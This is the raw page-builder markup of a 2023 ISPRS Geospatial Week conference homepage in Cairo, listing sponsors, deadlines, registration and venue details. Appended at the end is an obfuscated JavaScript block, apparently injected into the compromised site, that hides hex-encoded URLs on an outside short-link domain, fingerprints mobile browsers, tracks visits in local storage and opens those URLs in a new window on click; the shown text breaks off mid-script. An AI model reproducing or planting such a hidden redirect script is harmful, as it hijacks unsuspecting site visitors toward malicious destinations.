!important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201817367{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><img class=\"alignnone size-medium wp-image-4495 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 